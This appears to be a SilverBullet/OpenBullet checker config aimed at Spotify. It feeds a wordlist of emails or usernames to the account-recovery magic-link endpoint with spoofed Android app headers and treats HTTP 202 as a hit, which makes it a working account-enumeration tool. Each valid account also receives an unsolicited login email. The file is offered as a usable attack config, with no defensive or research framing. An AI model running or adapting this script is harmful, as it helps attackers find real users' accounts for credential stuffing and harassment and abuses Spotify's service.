[SETTINGS]
{
  "Name": "spotify VM",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-11-12T19:45:48.7167111+01:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "spotify VM",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://spclient.wg.spotify.com/accountrecovery/v3/magiclink/" 
  CONTENT "{\"emailOrUsername\":\"<USER>\",\"template\":\"login-autosend\"}" 
  CONTENTTYPE "application/json; charset=UTF-8" 
  HEADER "Host: spclient.wg.spotify.com" 
  HEADER "accept-language: fr-FR;q=1, en-US;q=0.5" 
  HEADER "user-agent: Spotify/8.6.8 Android/22 (HUAWEI RIO-L01)" 
  HEADER "spotify-app-version: 8.6.8" 
  HEADER "x-client-id: 9a8d2f0ce77a4e248bb71fefcb557637" 
  HEADER "app-platform: Android" 
  HEADER "content-type: application/json; charset=UTF-8" 
  HEADER "accept-encoding: gzip" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<RESPONSECODE>" Contains "202" 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" Contains "404" 

